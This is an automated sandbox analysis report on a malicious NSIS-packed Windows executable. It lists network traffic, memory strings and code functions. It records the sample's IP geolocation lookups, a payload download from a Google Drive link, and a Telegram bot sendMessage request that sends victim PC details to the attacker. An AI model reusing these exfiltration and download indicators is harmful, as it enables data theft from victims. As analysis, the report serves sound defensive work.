            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:15:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 15:16:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E22000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: OeM750ajqm.exe, OeM750ajqm.exe, 00000004.00000002.2525450879.000000000040A000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: OeM750ajqm.exe, 00000003.00000000.1282960311.000000000040A000.00000008.00000001.01000000.00000004.sdmp, OeM750ajqm.exe, 00000003.00000002.1447703296.000000000040A000.00000004.00000001.01000000.00000004.sdmp, OeM750ajqm.exe, 00000004.00000002.2525450879.000000000040A000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DEA000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DDB000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: OeM750ajqm.exe, 00000004.00000002.2533503788.00000000082A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52D
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP
            Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download
            Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=download.c
            Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=downloadcn
            Source: OeM750ajqm.exe, 00000004.00000003.1651744557.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1CJUE5aKHdgpZk5l1u_PHfiJdD52DDFAP&export=downloadu
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CCE000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D3D000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036CF8000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D3D000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E3E000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036D59000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E50000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: OeM750ajqm.exe, 00000004.00000002.2556951447.0000000037F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594138057.00000000066C7000.00000004.00000020.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000003.1594428166.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036E16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00405640 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_00405640
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00406ADA3_2_00406ADA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_6D6C1B283_2_6D6C1B28
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00406ADA4_2_00406ADA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652C7384_2_0652C738
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652C4684_2_0652C468
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652D2784_2_0652D278
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065253704_2_06525370
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652C1464_2_0652C146
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06526FC84_2_06526FC8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652CFA94_2_0652CFA9
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652CCD84_2_0652CCD8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06529DE04_2_06529DE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652CA084_2_0652CA08
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652E9884_2_0652E988
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065269A04_2_065269A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06523E094_2_06523E09
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06523AB14_2_06523AB1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652E97B4_2_0652E97B
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0652F9614_2_0652F961
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065229EC4_2_065229EC
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F7B784_2_065F7B78
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F23004_2_065F2300
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F8FB04_2_065F8FB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FA0E04_2_065FA0E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F81D04_2_065F81D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FEE5F4_2_065FEE5F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F1A504_2_065F1A50
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F1A414_2_065F1A41
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FAE7F4_2_065FAE7F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F4A784_2_065F4A78
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F6E724_2_065F6E72
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F6E704_2_065F6E70
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FEE704_2_065FEE70
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FCE6F4_2_065FCE6F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F4A684_2_065F4A68
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F6A184_2_065F6A18
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F46104_2_065F4610
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FAA004_2_065FAA00
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F46204_2_065F4620
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F4ED04_2_065F4ED0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F72C84_2_065F72C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F4EC04_2_065F4EC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F22F04_2_065F22F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FF2F04_2_065FF2F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F1E984_2_065F1E98
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FAE904_2_065FAE90
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FCE804_2_065FCE80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F72B84_2_065F72B8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F1EA84_2_065F1EA8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F27584_2_065F2758
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F27484_2_065F2748
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F7B774_2_065F7B77
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F531A4_2_065F531A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FD3104_2_065FD310
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FB3104_2_065FB310
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FF3004_2_065FF300
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FD3004_2_065FD300
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F53284_2_065F5328
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F77224_2_065F7722
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F77204_2_065F7720
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FB3204_2_065FB320
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F5BD84_2_065F5BD8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F97C04_2_065F97C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FD7914_2_065FD791
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FF7904_2_065FF790
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FF7814_2_065FF781
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F57804_2_065F5780
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F2BB04_2_065F2BB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FB7B04_2_065FB7B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F97B04_2_065F97B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F2BAF4_2_065F2BAF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F8FA14_2_065F8FA1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FD7A04_2_065FD7A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FB7A04_2_065FB7A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F345F4_2_065F345F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F9C504_2_065F9C50
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F00404_2_065F0040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FBC404_2_065FBC40
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F64784_2_065F6478
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F34604_2_065F3460
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FDC1F4_2_065FDC1F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F001A4_2_065F001A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F30084_2_065F3008
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F30074_2_065F3007
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F9C3F4_2_065F9C3F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F60304_2_065F6030
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FDC304_2_065FDC30
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FBC2F4_2_065FBC2F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F60214_2_065F6021
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FFC204_2_065FFC20
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC0D04_2_065FC0D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FA0D04_2_065FA0D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE0C04_2_065FE0C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FC0C04_2_065FC0C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F08F04_2_065F08F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F08E04_2_065F08E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F04984_2_065F0498
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F04894_2_065F0489
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F64884_2_065F6488
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065F38B84_2_065F38B8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE0B04_2_065FE0B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FA55F4_2_065FA55F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_065FE5504_2_065FE550
